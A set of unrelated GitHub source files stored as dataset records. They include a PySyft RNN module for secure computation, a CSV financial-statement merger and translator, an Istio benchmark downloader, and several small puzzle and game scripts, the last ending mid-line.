item.contiguous().view(self.num_layers, 2, batch_size, self.hidden_size)\n for item in hc\n ]\n hc_fwd = [item[:, 0, :, :] for item in hc]\n hc_back = [item[:, 1, :, :] for item in hc]\n else:\n hc_fwd = hc\n\n # Run through rnn in the forward direction\n output = x.new(seq_len, batch_size, self.hidden_size).zero_()\n for t in range(seq_len):\n hc_fwd = self._apply_time_step(x, hc_fwd, t)\n output[t, :, :] = hc_fwd[0][-1, :, :]\n\n # Run through rnn in the backward direction if bidirectional==True\n if self.bidirectional:\n output_back = x.new(seq_len, batch_size, self.hidden_size).zero_()\n for t in range(seq_len - 1, -1, -1):\n hc_back = self._apply_time_step(x, hc_back, t, reverse_direction=True)\n output_back[t, :, :] = hc_back[0][-1, :, :]\n\n # Concatenate both directions\n output = torch.cat((output, output_back), dim=-1)\n hidden = [\n torch.cat((hid_item, back_item), dim=0)\n for hid_item, back_item in zip(hc_fwd, hc_back)\n ]\n else:\n hidden = hc_fwd\n\n # If batch_first == True, swap axis back to get original structure\n if self.batch_first:\n output = output.transpose(0, 1)\n hidden = [item.transpose(0, 1) for item in hidden]\n\n # Reshape hidden to the original shape of hc\n hidden = tuple(hidden) if self.is_lstm else hidden[0]\n\n return output, hidden\n\n def _init_hidden(self, input):\n \"\"\"\n This method initializes a hidden state when no hidden state is provided\n in the forward method. It creates a hidden state with zero values for each\n layer of the network.\n \"\"\"\n h = torch.zeros(\n self.num_layers * self.num_directions,\n input.shape[1],\n self.hidden_size,\n dtype=input.dtype,\n device=input.device,\n )\n if input.has_child() and isinstance(input.child, PointerTensor):\n h = h.send(input.child.location)\n if input.has_child() and isinstance(input.child, precision.FixedPrecisionTensor):\n h = h.fix_precision()\n child = input.child\n if isinstance(child.child, AdditiveSharingTensor):\n crypto_provider = child.child.crypto_provider\n owners = child.child.locations\n h = h.share(*owners, crypto_provider=crypto_provider)\n return h\n\n def _apply_time_step(self, x, hc, t, reverse_direction=False):\n \"\"\"\n Apply RNN layers at time t, given input and previous hidden states\n \"\"\"\n rnn_layers = self.rnn_backward if reverse_direction else self.rnn_forward\n\n hc = torch.stack([*hc])\n hc_next = torch.zeros_like(hc)\n\n for layer in range(self.num_layers):\n inp = x[t, :, :] if layer == 0 else hc_next[0][layer - 1, :, :].clone()\n\n if self.is_lstm:\n hc_next[:, layer, :, :] = torch.stack(rnn_layers[layer](inp, hc[:, layer, :, :]))\n else:\n hc_next[0][layer, :, :] = rnn_layers[layer](inp, hc[0][layer, :, :])\n\n return hc_next\n\n\nclass RNN(RNNBase):\n \"\"\"\n Python implementation of RNN for MPC\n This class overrides the torch.nn.RNN\n \"\"\"\n\n def __init__(\n self,\n input_size,\n hidden_size,\n num_layers=1,\n nonlinearity=\"tanh\",\n bias=True,\n batch_first=False,\n dropout=0,\n bidirectional=False,\n ):\n\n super(RNN, self).__init__(\n input_size,\n hidden_size,\n num_layers,\n bias,\n batch_first,\n dropout,\n bidirectional,\n RNNCell,\n nonlinearity,\n )\n\n\nclass GRU(RNNBase):\n \"\"\"\n Python implementation of GRU for MPC\n This class overrides the torch.nn.GRU\n \"\"\"\n\n def __init__(\n self,\n input_size,\n hidden_size,\n num_layers=1,\n bias=True,\n batch_first=False,\n dropout=0,\n bidirectional=False,\n ):\n\n super(GRU, self).__init__(\n input_size, hidden_size, num_layers, bias, batch_first, dropout, bidirectional, GRUCell\n )\n\n\nclass LSTM(RNNBase):\n \"\"\"\n Python implementation of LSTM for MPC\n This class overrides the torch.nn.LSTM\n \"\"\"\n\n def __init__(\n self,\n input_size,\n hidden_size,\n num_layers=1,\n bias=True,\n batch_first=False,\n dropout=0,\n bidirectional=False,\n ):\n\n super(LSTM, self).__init__(\n input_size, hidden_size, num_layers, bias, batch_first, dropout, bidirectional, LSTMCell\n )\n","repo_name":"gkaissis/PriMIA","sub_path":"syft/frameworks/torch/nn/rnn.py","file_name":"rnn.py","file_ext":"py","file_size_in_byte":12742,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"61"} +{"seq_id":"28896148372","text":"import os\n\n# This function returns a list of all files located in the given directory path \n# and its subdirectories \ndef list_files(directory):\n # Initialize an empty list to store the file paths\n file_list = []\n \n # Recursively search for files in the given directory and its subdirectories using the os.walk() method\n for root, dirs, files in os.walk(directory):\n # Iterate over each file in the current directory level and append its full path to the list\n for name in files:\n file_list.append(os.path.join(root, name))\n \n # Return the final list of file paths\n return file_list\n\nimport pandas as pd\n# 写一个 function,参数是文件路径列表,加载其中 .csv 格式的文件数据,存储在 dataframe 中\n# 写好注释\ndef load_csv_files(file_list):\n \"\"\"\n 读取文件路径列表中CSV格式的文件,将数据存储在一个DataFrame对象中\n \n 参数:\n file_list: 文件路径列表\n \n 返回:\n DataFrame: 所有CSV文件的数据以及其它类型文件被忽略,返回一个DataFrame对象\n \"\"\"\n # 创建一个空的 Pandas DataFrame 对象\n df = pd.DataFrame()\n \n for file_path in file_list:\n # 检查文件是否是CSV格式,并且过滤掉文件 finance.csv \n if not file_path.endswith('.csv') or 'finance.csv' in os.path.basename(file_path):\n continue\n \n # 读取文件,并将内容添加到 DataFrame 中\n print('file_path %s', file_path)\n df_temp = pd.read_csv(file_path) # 检查文件是否为空,如果为空抛出异常,异常中包含文件名\n if df_temp.empty:\n print(f\"{file_path} is empty. SKIP\")\n \n for index, row in df_temp.iterrows():\n val = row[0]\n if isinstance(val, str) and (val.endswith(':') or val.endswith(':')):\n # 去掉结尾的字符\n df_temp.iat[index, 0] = val[:-1]\n \n df = pd.concat([df, df_temp], ignore_index=True)\n \n return df\n\n# 写一个 python function,参数是 dataframe 和 文件路径\n# 判断文件是否为 csv 格式,如果不是 csv 格式抛出异常\n# 否则加载文件内容,并将 dataframe 的数据也添加到文件中\n# 并对同一列相同的行进行合并\n# 写好注释\ndef add_dataframe_to_csv(dataframe, file_path):\n \"\"\"\n This function loads data from a csv file and a dataframe. Merges rows with same value in a certain column.\n \n Args:\n - dataframe: pandas DataFrame object\n - file_path: str, file path of the csv file to be loaded\n \n Returns:\n - None\n \n Raises:\n - ValueError: if the file extension is not csv\n \n \"\"\"\n # 检查文件是否为 csv 格式\n if file_path.endswith('.csv') == False:\n raise ValueError(\"Only csv files are accepted\")\n\n # 检查文件 file_path 是否为空\n # 如果为空,打印日志,并创建空的 DataFrame\n # 如果不为空,加载文件内容到 df 中\n if os.path.getsize(file_path) > 0:\n df = pd.read_csv(file_path)\n else:\n print(f\"File {file_path} is empty. Init a DataFrame object.\")\n df = pd.DataFrame()\n\n # 将传入的 dataframe 添加到已有数据中\n df=df.append(dataframe)\n\n # dataframe 去重\n # 如果不同行第一列的内容一样,进行去重\n df.drop_duplicates(subset=df.columns[0], keep='last', inplace=True)\n\n # 保存更新后的 dataframe 到 csv 文件\n df.to_csv(file_path, index=False)\n\n\n# 写一个 python main 接收两个命令行参数,分别是文件夹路径和文件路径\n# 其中文件夹路径必选,文件路径可选\n# 如果文件路径参数不存在,就在文件夹下创建文件,名文:finance.csv\nimport sys\nimport os\n\ndef main(directory_path, dictionary, file_path=None):\n \"\"\"\n A function that takes a directory path and an optional file path as arguments.\n If the file path argument is not given, it creates a CSV file named finance.csv in the directory path.\n If the file path argument is given, it checks if the file is in CSV format. If it's not, it raises an exception.\n If it's a CSV file, it loads its content, adds the data to the dataframe along with the existing data and merges the rows with same column value.\n\n Parameters:\n directory_path (str): Path of the directory where the csv file will be created or updated.\n file_path (str, optional): Path of the csv file to update. Defaults to None.\n\n Returns:\n None\n \"\"\"\n\n # If file path is not provided, create a finance.csv file in the directory\n if file_path is None:\n last_folder_name = os.path.basename(os.path.normpath(directory_path))\n file_path = os.path.join(directory_path, last_folder_name+'.finance.csv')\n\n if not os.path.exists(file_path):\n with open(file_path, 'w') as f:\n pass\n\n file_list = list_files(directory_path)\n df = load_csv_files(file_list)\n # 翻译财报条目为简体中文\n [df, missed_keys] = translate_to_simplified_chinese(df, dictionary)\n print(f\"未能翻译的条目如下: \\n\\n\")\n for key in missed_keys:\n print(key)\n add_dataframe_to_csv(df, file_path)\n\n# prompt: 定义一个 function,参数是: dataframe,dictionary。\n# dictionary 是个 key/value 的map。\n# dataframe 第一列的内容是字符串,遍历第一列所有的单元,将单元内容作为 key,查询 dictionary 中的值 value。\n# 如果 value 不存在,就使用默认值 N/A。\n# 最后将 value 作为第二列插入到 dataframe 中。\n## 将第一列翻译为简体中文(美股、港股的财报都不是简体中文的)\n## 翻译为简体中文,可以统一术语\ndef translate_to_simplified_chinese(dataframe, dictionary, default_value='N/A'):\n \"\"\"\n This function takes a dataframe and a dictionary as parameters. The dictionary is a key/value map.\n The first column of the dataframe contains strings. For each cell in the first column, this function\n will use its contents as a key to look up the corresponding value in the dictionary. If the value does\n not exist in the dictionary, then the default value specified (which defaults to 'N/A') will be used\n instead. The resulting values will be added as a new column to the dataframe.\n \"\"\"\n new_column = []\n missed_keys = []\n for _index, row in dataframe.iterrows():\n key = row[0]\n if key in dictionary:\n value = dictionary[key]\n else:\n value = default_value\n missed_keys.append(key)\n \n new_column.append(value)\n dataframe.insert(1, '项目', new_column)\n return [dataframe, missed_keys]\n\n\nfrom dictionary import load_data_from_file \n\nif __name__ == \"__main__\":\n try:\n# directory_path = sys.argv[1]\n directory_path = 'data/tesla'\n file_path = sys.argv[2] if len(sys.argv) > 2 else None\n print(\"start\")\n dictionary = load_data_from_file('src/dictionary.dict')\n main(directory_path, dictionary, file_path)\n except Exception as e:\n # 打印详细的堆栈信息\n import traceback\n print(traceback.format_exc())\n print(\"Usage: python script.py [directory_path] [file_path]\")\n","repo_name":"zman2013/extract_table_by_ocr","sub_path":"src/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":7293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29354002572","text":"import os\nimport datetime\nfrom google.cloud import storage\n\n\ncwd = os.getcwd()\nperf_data_path = cwd + \"/perf_data/\"\n\nload_generator_type = \"fortio\"\n\n\ndef download_benchmark_csv(download_dataset_days, current_release, project_id, bucket_name):\n\n if not current_release:\n current_release = os.getenv('CUR_RELEASE')\n if not project_id:\n project_id = os.getenv('PROJECT_ID')\n if not bucket_name:\n bucket_name = os.getenv('BUCKET_NAME')\n if not download_dataset_days:\n download_dataset_days = os.getenv('DOWNLOAD_DATASET_DAYS')\n\n bucket_prefix = os.getenv('BUCKET_PREFIX')\n bucket_delimiter = os.getenv('BUCKET_DELIMITER')\n\n print(current_release, project_id, bucket_name, bucket_prefix, bucket_delimiter, download_dataset_days)\n\n if not os.path.exists(perf_data_path):\n os.makedirs(perf_data_path)\n\n download_dateset = get_download_dateset(int(download_dataset_days))\n storage_client = storage.Client(project_id)\n\n bucket = storage_client.bucket(bucket_name)\n\n blobs = storage_client.list_blobs(bucket_name, prefix=bucket_prefix, delimiter=bucket_delimiter)\n print(list(blobs))\n prefixes = blobs.prefixes\n print(prefixes)\n\n cur_href_links = []\n cur_release_names = []\n cur_release_dates = []\n master_href_links = []\n master_release_names = []\n master_release_dates = []\n process_prefixes(download_dateset, bucket, prefixes, cur_href_links, cur_release_names, cur_release_dates,\n master_href_links, master_release_names, master_release_dates, current_release)\n\n delete_outdated_files(download_dateset)\n return cur_href_links, cur_release_names, cur_release_dates, master_href_links, master_release_names, master_release_dates\n\n\ndef process_prefixes(download_dateset, bucket, prefixes, cur_href_links, cur_release_names, cur_release_dates,\n master_href_links, master_release_names, master_release_dates, current_release):\n\n for prefix in prefixes:\n print(f\"{prefix}\")\n if load_generator_type in prefix:\n # an example benchmark_test_id would be like:\n # \"20200525_fortio_master_1.7-alpha.d0e07f6e430fd99554ccc3aee3be8a730cd8a226\"\n benchmark_test_id = prefix.split('/')[1]\n if current_release.split(\"-\")[1] in benchmark_test_id or \"master\" in benchmark_test_id:\n test_date, test_load_gen_type, test_branch, release_name = parse_perf_href_str(benchmark_test_id)\n print(f\"date: {test_date}, test_branch: {test_branch}, release_name: {release_name}\")\n if test_date in download_dateset:\n download_filename = \"benchmark.csv\"\n dump_filename = benchmark_test_id + \"_\" + download_filename\n dump_to_filepath = perf_data_path + dump_filename\n is_exist = check_exist(dump_filename)\n\n # Make the API the same as previously so view.py parsing works.\n fake_prefix = \"/././\" + prefix\n if test_branch == \"master\":\n master_href_links.insert(0, fake_prefix)\n master_release_names.insert(0, release_name)\n master_release_dates.insert(0, test_date)\n else:\n cur_href_links.insert(0, fake_prefix)\n cur_release_names.insert(0, release_name)\n cur_release_dates.insert(0, test_date)\n try:\n if is_exist:\n continue\n blob_id = prefix + download_filename\n blob = bucket.blob(blob_id)\n blob.download_to_filename(dump_to_filepath)\n print(f\"downloaded: {blob_id}\")\n except Exception as e:\n if test_branch == \"master\":\n master_href_links.pop(0)\n master_release_names.pop(0)\n master_release_dates.pop(0)\n else:\n cur_href_links.pop(0)\n cur_release_names.pop(0)\n cur_release_dates.pop(0)\n print(e)\n else:\n continue\n\n\ndef get_download_dateset(download_dataset_days):\n download_dateset = set()\n today = datetime.date.today() + datetime.timedelta(days=1)\n for day_interval in list(range(1, download_dataset_days)):\n prev_date = (today - datetime.timedelta(day_interval)).strftime(\"%Y%m%d\")\n download_dateset.add(prev_date)\n return download_dateset\n\n\ndef delete_outdated_files(download_dateset):\n filenames = ['master_temp.csv', 'cur_temp.csv']\n for f in os.listdir(perf_data_path):\n if f in filenames:\n continue\n f_prefix = f.split(\"_\")[0]\n if f_prefix not in download_dateset:\n os.remove(perf_data_path + f)\n\n\ndef check_exist(filename):\n for f in os.listdir(perf_data_path):\n if f == filename:\n return True\n return False\n\n\ndef parse_perf_href_str(benchmark_test_id):\n # TODO:\n # - can make this to be env var: LOAD_GEN_TYPE for switching between fortio and nighthawk\n # - extract test_parts to a class when pipeline label is stable\n test_parts = benchmark_test_id.split(\"_\")\n test_date = test_parts[0]\n test_load_gen_type = test_parts[1]\n test_branch = test_parts[2]\n release_name = test_parts[3]\n return test_date, test_load_gen_type, test_branch, release_name\n","repo_name":"istio/tools","sub_path":"perf_dashboard/helpers/bucket.py","file_name":"bucket.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","stars":328,"dataset":"github-code","pt":"61"} +{"seq_id":"72494170434","text":"import os\n\n\nclass FileSysUtils:\n\n @staticmethod\n def validate_directory_path(name, path):\n if os.path.isdir(path):\n return True\n else:\n print(f'Provided {name} directory path does not point to a directory: {path}')\n sys.exit(2)\n\n @staticmethod\n def validate_file_path(name, path):\n if os.path.isfile(path):\n return True\n else:\n print(f'Provided {name} file path does not point to a file: {path}')\n sys.exit(2)","repo_name":"lair001/login-manager","sub_path":"src/login_manager/libs/utils/FileSysUtils.py","file_name":"FileSysUtils.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19359573753","text":"#!/usr/bin/env python3\n\nimport sys\n\nclass Ship:\n EAST = (0,1)\n WEST = (0,-1)\n NORTH = (1,0)\n SOUTH = (-1,0)\n\n RIGHT = -1\n LEFT = 1\n\n ccw_order = [EAST, NORTH, WEST, SOUTH]\n\n def __init__(self, direction, starting_pos = (0,0)):\n self.direction = direction\n self.position = starting_pos\n \n @staticmethod\n def _add_vec(pos, dpos):\n x,y = pos\n dx,dy = dpos\n\n return (x+dx,y+dy)\n\n def move_towards(self,direction, steps):\n x,y = direction\n direction = (x*steps, y*steps)\n self.position = Ship._add_vec(self.position, direction)\n\n def move_forward(self, steps):\n self.move_towards(self.direction,steps)\n \n def change_direction(self, d, steps):\n index = Ship.ccw_order.index(self.direction) + d*steps\n index = index % len(Ship.ccw_order)\n self.direction = Ship.ccw_order[index]\n\n def follow_command(self, command):\n c, steps = command[0], int(command[1:])\n turns = {'L' : Ship.LEFT,'R' : Ship.RIGHT}\n dirs = {'E' : Ship.EAST,'S': Ship.SOUTH,'N': Ship.NORTH,'W': Ship.WEST}\n moves = ['F']\n\n if c in turns:\n self.change_direction(turns[c], steps//90)\n elif c in dirs:\n self.move_towards(dirs[c], steps)\n elif c in moves:\n self.move_forward(steps)\n \n\n def follow_commands(self, commands):\n for comm in commands:\n self.follow_command(comm)\n print(self.position)\n\nif __name__ == \"__main__\":\n FILENAME = \"input.txt\"\n if len(sys.argv) > 1:\n FILENAME = sys.argv[1]\n \n with open(FILENAME) as inp:\n commands = [line.strip() for line in inp.readlines()]\n \n ship = Ship(Ship.EAST)\n ship.follow_commands(commands)\n x,y = ship.position\n print(f'The position of the ship is {ship.position} and manhatten distance {abs(x) + abs(y)}')","repo_name":"NewbieGoose/aoc2020","sub_path":"day12/directions.py","file_name":"directions.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"24674892832","text":"N = 5\nmaxDepth = 3\nresults = {}\nimport random, re\n\nnextmove = ''\n\nfrom operator import itemgetter\nimport time, sys\n\nsys.setrecursionlimit(1000000)\n\n\nclass field:\n def __init__(self, fieldString):\n self.fieldString = fieldString\n\n def getPossibleMoves(self, move):\n\n fieldString = self.fieldString\n\n moves = []\n for i in range(0, N * N):\n if fieldString[i] == ' ':\n moves.append([fieldString[:i] + move.lower() + fieldString[i + 1:], 'N'])\n elif fieldString[i].lower() != move.lower() and str.islower(fieldString[i]):\n moves.append([fieldString[:i] + move.upper() + fieldString[i + 1:], 'R'])\n return moves\n\n def getScore(self, turnNumber):\n winner = self.getWinner()\n if (winner == 'X'):\n return (N * N - turnNumber) * 10 ** (N - 1)\n # return (N*N)*10**(N-1)\n elif (winner == 'O'):\n return (-N * N + turnNumber) * 10 ** (N - 1)\n # return (N*N)*10**(N-1)\n else:\n return 0;\n\n def gameEnded(self):\n if (' ' not in self.fieldString or self.getScore(0) != 0):\n return True\n else:\n return False\n\n def printField(self):\n print('\\n\\n')\n for i in range(0, N):\n print('-' * (4 * N + 1))\n print('|', end='')\n for j in range(0, N):\n print(' ' + self.fieldString[i * N + j] + ' |', end='')\n print('')\n print('-' * (4 * N + 1))\n\n def newMoveString(self, pos, move):\n if (self.fieldString[pos - 1] == ' '):\n return self.fieldString[:pos - 1] + move.lower() + self.fieldString[pos:]\n else:\n rand = random.uniform(0, 1)\n print('player is trying to invade another players cell! rand value:', rand)\n if (rand > 0.5):\n return self.fieldString[:pos - 1] + move.upper() + self.fieldString[pos:]\n else:\n return self.fieldString\n\n def getString(self):\n return self.fieldString\n\n def heuristic(self):\n currentField = (self.fieldString).upper()\n points = 0\n\n # X perspective\n # diag1\n line = currentField[0:N * N:N + 1]\n # finding consecutive length - stackoverflow\n lengthX = line.count('X')\n lengthO = line.count('O')\n # its pointless to continue row if there is other symbol\n if (lengthO == 0):\n points += 10 ** (lengthX - 1)\n if (lengthX == 0):\n points -= 10 ** (lengthO - 1)\n # diag2\n line = currentField[N - 1:N * N - 1:N - 1]\n lengthX = line.count('X')\n lengthO = line.count('O')\n if (lengthO == 0):\n points += 10 ** (lengthX - 1)\n if (lengthX == 0):\n points -= 10 ** (lengthO - 1)\n # verticals\n for i in range(0, N):\n line = currentField[i:N * N:N]\n lengthX = line.count('X')\n lengthO = line.count('O')\n if (lengthO == 0):\n points += 10 ** (lengthX - 1)\n if (lengthX == 0):\n points -= 10 ** (lengthO - 1)\n # horizontals\n for i in range(0, N):\n line = currentField[i * N:(i + 1) * N]\n lengthX = line.count('X')\n lengthO = line.count('O')\n if (lengthO == 0):\n points += 10 ** (lengthX - 1)\n if (lengthX == 0):\n points -= 10 ** (lengthO - 1)\n\n return round(points)\n\n def getSymmetryStrings(self):\n\n fieldString = (self.fieldString).upper()\n\n stringList = list(fieldString)\n symms = []\n\n # get vertical symmetry\n for i in range(0, N):\n for j in range(0, N // 2):\n stringList[i * N + j], stringList[(i + 1) * N - j - 1] = stringList[(i + 1) * N - j - 1], \\\n stringList[i * N + j]\n symms.append(''.join(stringList))\n\n # get horizontal symmetry\n stringList = list(fieldString)\n for i in range(0, N):\n for j in range(0, N // 2):\n stringList[j * N + i], stringList[(N - j - 1) * N + i] = stringList[(N - j - 1) * N + i], \\\n stringList[j * N + i]\n symms.append(''.join(stringList))\n\n '''#get reverse(?) symmetry\n stringList = list(fieldString)\n for i in range(0,N*N//2):\n stringList[i], stringList[N*N-1-i] = stringList[N*N-1-i], stringList[i]\n symms.append(''.join(stringList))'''\n\n # get diag1 symmetry\n stringList = list(fieldString)\n for i in range(0, N):\n for j in range(i, N):\n stringList[i * N + j], stringList[j * N + i] = stringList[j * N + i], stringList[i * N + j]\n symms.append(''.join(stringList))\n\n # get diag2 symmetry\n stringList = list(fieldString)\n for i in range(0, N):\n for j in range(0, N - i):\n stringList[i * N + j], stringList[(N - 1 - j) * N + (N - 1 - i)] = stringList[(N - 1 - j) * N + (\n N - 1 - i)], stringList[i * N + j]\n symms.append(''.join(stringList))\n\n return symms\n\n def getWinner(self):\n\n currentField = (self.fieldString).upper()\n\n # diag1\n line = currentField[0:N * N:N + 1]\n if (line[0] != ' ' and len(set(line)) == 1):\n return line[0]\n\n # diag2\n line = currentField[N - 1:N * N - 1:N - 1]\n if (line[0] != ' ' and len(set(line)) == 1):\n return line[0]\n\n # verticals\n for i in range(0, N):\n line = currentField[i:N * N:N]\n if (line[0] != ' ' and len(set(line)) == 1):\n return line[0]\n\n # horizontals\n for i in range(0, N):\n line = currentField[i * N:(i + 1) * N]\n if (line[0] != ' ' and len(set(line)) == 1):\n return line[0]\n\n return None\n\n def minimax(fieldString, move, depth, alpha, beta):\n\n currentField = field(fieldString);\n global mainField, nextmove\n\n symms = currentField.getSymmetryStrings()\n symmFound = False\n for symm in symms:\n if symm in results:\n if (depth > 0):\n return results[symm]\n\n if (depth > maxDepth):\n return currentField.heuristic()\n\n if (currentField.getWinner() is not None):\n return currentField.getScore(depth)\n\n if (currentField.gameEnded()):\n return 0;\n\n active_turn = move\n local_scores = []\n score = 0\n\n possibleMoves = currentField.getPossibleMoves(move)\n\n for possibleField in possibleMoves:\n if possibleField[0] in results:\n score = results[possibleField[0]]\n local_scores.append([possibleField[0], score, possibleField[1]])\n else:\n if possibleField[1] == 'R':\n if (depth > 50):\n return 0\n else:\n # good scenario\n score1 = minimax(possibleField[0], 'X' if (move == 'O') else 'O', depth + 1, alpha, beta)\n # bad scenario\n score2 = minimax(fieldString, 'X' if (move == 'O') else 'O', depth + 1, alpha, beta)\n score = int((score1 + score2) / 2)\n else:\n score = minimax(possibleField[0], 'X' if (move == 'O') else 'O', depth + 1, alpha, beta)\n local_scores.append([possibleField[0], score, possibleField[1]])\n results[possibleField[0]] = score\n\n if (depth == 0):\n print(local_scores, depth, N * N - depth, -N * N + depth)\n\n local_scores = sorted(local_scores, key=itemgetter(1), reverse=True)\n returnField = local_scores[0][0] if (active_turn == 'X') else local_scores[-1][0]\n returnScore = local_scores[0][1] if (active_turn == 'X') else local_scores[-1][1]\n moveType = local_scores[0][2] if (active_turn == 'X') else local_scores[-1][2]\n candidates = []\n\n '''for candidate in local_scores:\n if abs(candidate[1]-returnScore < 0.1):\n if (depth==0):\n print('we are appending candidate here , coz ',abs(candidate[1]-returnScore), abs(candidate[1]-returnScore) < 0.1)\n candidates.append(candidate)\n suggestion = random.choice(candidates)\n if (depth==0):\n print(candidates)'''\n if (depth == 0):\n if (moveType == 'R'):\n rand = random.uniform(0, 1)\n print ('computer is trying to capture your cell!! rand value', rand)\n if (rand > 0.5):\n newFieldString = returnField\n else:\n newFieldString = fieldString\n else:\n newFieldString = returnField\n field(newFieldString).printField()\n mainField = field(newFieldString)\n return returnScore\n\n mainField = field(' ' * N * N)\n\n while (not mainField.gameEnded()):\n minimax(mainField.getString(), 'X', 0, -99999, 99999)\n\n if mainField.gameEnded():\n break;\n\n fieldNum = int(input('Choose your move number '))\n mainField = field(mainField.newMoveString(fieldNum, 'O'))\n print('field after your move')\n mainField.printField()\n fieldNum = input('Press enter for computer move')\n\n if mainField.getWinner() is not None:\n print('Player', mainField.getWinner(), 'wins!')\n else:\n print ('Its a draw!')\n\n '''mainField = field('O O ')\n symms = mainField.getPossibleMoves('X')\n for sym in symms:\n print(sym)'''\n","repo_name":"PavelSafin/decision-theory","sub_path":"lab3/ttt_random.py","file_name":"ttt_random.py","file_ext":"py","file_size_in_byte":10334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72654281473","text":"'''\r\nA Pythagorean triplet is a set of three natural numbers, a < b < c, for which, a^2 + b^2 = c^2 \r\n\r\nFor example, 3^2 + 4^2 = 9 + 16 = 25 = 5^2.\r\n\r\nThere exists exactly one Pythagorean triplet for which a + b + c = 1000. Find the product abc.\r\n'''\r\n\r\nimport numpy as np\r\n\r\na = 1\r\nb = 2\r\nc = 3\r\n\r\nfor C in range(c,1000):\r\n for B in np.arange(b,C):\r\n\r\n for A in np.arange(a,B):\r\n\r\n if (int(A + B + C) == 1000 and (A**2 + B**2 == C**2)):\r\n print(A,B,C)\r\n print(int(A*B*C))\r\n break\r\n\r\n if (int(A + B + C) == 1000 and (A**2 + B**2 == C**2)):\r\n break\r\n\r\n if (int(A + B + C) == 1000 and (A**2 + B**2 == C**2)):\r\n break\r\n\r\n","repo_name":"grahammauer/Project-Euler","sub_path":"9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29945955901","text":"\nimport os\nimport pygame\nimport random\nimport sys\n\nimport config\nimport gfxlib\n\npygame.init()\n\n\ndef resource_path(relative_path):\n try:\n # PyInstaller creates a temp folder and stores path in _MEIPASS\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.abspath(\".\")\n\n return os.path.join(base_path, relative_path)\n\ndef intro_background(display):\n colors = [\n (0, 0, 128),\n (64, 64, 192),\n (128, 64, 192),\n (192, 64, 128),\n (192, 0, 0),\n (0, 0, 0)\n ]\n for i in range(6):\n slice = pygame.Surface((display.Scale * display.Width, 50 * display.Scale))\n pygame.draw.rect(slice, colors[i], pygame.Rect(0, 0, display.Scale * display.Width, 50 * display.Scale))\n config.intro_slices.append(slice)\n\n config.scroll = pygame.Surface((display.Scale * display.Width * 9, 20 * display.Scale))\n blob1 = gfxlib.draw_string_surface(display.Scale, 'DROMEGADARUS', True)\n blob2 = gfxlib.draw_string_surface(display.Scale, '@JOACHIM LENNERSKANS 2022')\n blob3 = gfxlib.draw_string_surface(display.Scale, 'USE LEFT CTRL AND ARROWS')\n blob4 = gfxlib.draw_string_surface(display.Scale, 'PRESS THE ANY KEY')\n config.scroll.fill((0, 0, 0))\n config.scroll.blit(blob1, (display.Scale * 240 * 1, display.Scale * 2))\n config.scroll.blit(blob2, (display.Scale * 240 * 2, display.Scale * 6))\n config.scroll.blit(blob1, (display.Scale * 240 * 3, display.Scale * 2))\n config.scroll.blit(blob3, (display.Scale * 240 * 4, display.Scale * 6))\n config.scroll.blit(blob1, (display.Scale * 240 * 5, display.Scale * 2))\n config.scroll.blit(blob4, (display.Scale * 240 * 6, display.Scale * 6))\n \ndef background(display):\n colors = [\n (255, 64, 0),\n (255, 64, 0),\n (255, 64, 0),\n (255, 128, 64),\n (255, 128, 64),\n (255, 128, 64),\n (255, 128, 64),\n (255, 192, 64),\n (255, 192, 64),\n (255, 192, 64),\n (64, 128, 64),\n (64, 128, 64),\n (64, 128, 64),\n (64, 192, 64),\n (64, 192, 64),\n (64, 192, 64),\n (64, 192, 64),\n (64, 255, 64),\n (64, 255, 64),\n (64, 255, 64)\n ]\n\n for y in range(display.Height):\n for x in range(display.Width):\n i = 0 if x % 2 == y % 2 else 1\n if y < 60:\n j = int(y / 12) * 2\n else:\n j = int((y - 60) / 20) * 2 + 10\n \n pygame.draw.rect(display.Screen, colors[j + i], \n pygame.Rect(display.x(x), display.y(y), display.h(1), display.w(1)))\n\n config.background_screen = display.Screen.subsurface(\n pygame.Rect(display.x(0), display.y(0), display.w(display.Width), display.h(display.Height))\n ).copy()\n pygame.display.flip()\n\ndef toggle(map, y, x, char):\n if map[y][x] == 'X':\n return map\n elif char == '/' and map[y][x] == '\\\\':\n map[y][x] = 'V'\n elif char == '\\\\' and map[y][x] == '/':\n map[y][x] = 'V'\n else:\n map[y][x] = char\n\n return map\n\ndef mountains(display):\n mountain_width = 90\n config.mountain_gfx = pygame.Surface(((mountain_width + 30) * 8 * display.Scale, 72 * display.Scale))\n slice = config.background_screen.subsurface(pygame.Rect(0, 4 * display.Scale, 8 * display.Scale, 72 * display.Scale))\n for x in range(mountain_width + 30):\n config.mountain_gfx.blit(slice, (x * 8 * display.Scale, 0))\n\n character_lookup = {\n 'X': 58,\n 'V': 59,\n '/': 56,\n '\\\\': 57\n }\n\n # Create three levels of mountains at random\n character_offset = [0, -12, 4]\n heights = [7, 6, 5]\n numbers = [12, 10, 8]\n for level in range(3):\n map = []\n for y in range(7):\n map.append([])\n for x in range(mountain_width):\n map[y].append('.')\n\n for mountain in range(numbers[level]):\n height = random.randrange(2, heights[level] + 1)\n midx = random.randrange(height - 1, mountain_width - height)\n for i in range(height):\n y = 7 - height + i\n map = toggle(map, y, midx - i, '/')\n map = toggle(map, y, midx + i + 1, '\\\\')\n for x in range(i):\n map = toggle(map, y, midx - x, 'X')\n map = toggle(map, y, midx + x + 1, 'X')\n\n # Blit mountains\n for y in range(len(map)):\n for x in range(len(map[y])):\n if map[y][x] == '.':\n continue\n char = config.characters[character_lookup[map[y][x]] + character_offset[level]]\n config.mountain_gfx.blit(char, (x * 8 * display.Scale, (y + level) * 8 * display.Scale))\n if x < 30:\n config.mountain_gfx.blit(char, ((90 + x) * 8 * display.Scale, (y + level) * 8 * 